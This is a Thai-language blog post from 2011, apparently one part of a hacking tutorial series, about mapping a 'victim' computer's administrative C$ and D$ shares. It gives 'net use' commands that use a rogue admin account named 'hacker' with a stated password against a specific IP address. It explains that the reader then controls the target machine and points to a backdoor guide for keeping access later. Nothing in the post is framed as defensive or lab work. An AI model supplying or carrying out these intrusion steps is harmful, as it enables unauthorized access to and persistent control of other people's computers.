วันอังคารที่ 31 พฤษภาคม พ.ศ. 2554

การ Map Drive

การ Map Drive

และ หลังจากที่คุณได้สร้าง User Admin ในเครื่องเหยื่อได้แล้วที่ชื่อ hacker และมี password เป็น passhack และก่อนหน้านี้คุณได้แสกนเครื่องเหยื่อแล้วว่าเครื่องเหยื่อได้เปิด share ที่ไดร์ฟ C: (ถ้า งง กลับไปอ่านเรื่อง scan ใหม่)ให้คุณพิมพ์คำสั่งด้านล่างนี้เพื่อเข้าไป MapDrive C: ของเครื่องเหยื่อ
net use \\ 203.114.234.5 \ C$ passhack /u:hacker
คำ สั่งบนนี้ จะเป็นการเชื่อมต่อไปที่ share drive c: ในเครื่องเป้าหมาย โดย PasswordAdmin เป็นสิ่งที่ได้มาจากขั้นตอนด้านบนเรียบร้อยมาแล้วนะครับ โดยเครื่องนั้นต้องเปิด share C$ มาก่อนหน้านี้ แต่ถ้าคุณได้ใช้คำสั่งนี้แล้วยังเชื่อมต่อ (connect) ยังไม่ได้อีกคุณอาจต้องพิมพ์
net use \\ 203.114.234.5 \ C$ passhack /u:203.114.234.5\ :hacker
โดยเพิ่ม 203.114.234.5 มาตรงหน้า user Admin ขึ้นมาครับหรือ
net use \\ 203.114.234.5 \ C$ passhack /u:ชื่อเครื่องเหยื่อหรือชื่อ domain\ :hacker
แต่ถ้าพิมพ์เป็น net use \\ ...IP เหยื่อ.. \D$ passhack /u: hacker
D$ เป็นการ connect เชื่อมต่อที่ share ของ drive D:
ซึ่ง ตอนนี้อาจลองเช็คดู IP ที่หน้าต่างดอสนี้โดยลองพิมพ์ ipconfig หรือใช้คำสั่ง dir ในหน้าต่างนี้ เพื่อให้แน่ใจว่าเป็นเครื่องเป้าหมาย ถ้าลองดูแล้วเป็นเครื่องเป้าหมายจริงๆ ก็เหมือนกับคุณได้นั่งอยู่หน้าเครื่องเป้าหมายจริงๆ การพิมพ์คำสั่งต่างๆในหน้าต่างนี้ ก็คือการสั่งคำสั่งต่างๆในเครื่องเป้าหมาย ไม่ใช่เครื่องคุณ และคุณอาจส่งไฟล์ไปโดยโปรแกรม remote เพื่อที่จะสร้างทางลับต่าง เพื่อที่จะเข้าไปควบคุมอีก ในโอกาสหน้า การส่งโปรแกรมไปนั้น ดูวิธีได้จาก link Backdoor


Credit MATERIA@astec-i

ไม่มีความคิดเห็น:

แสดงความคิดเห็น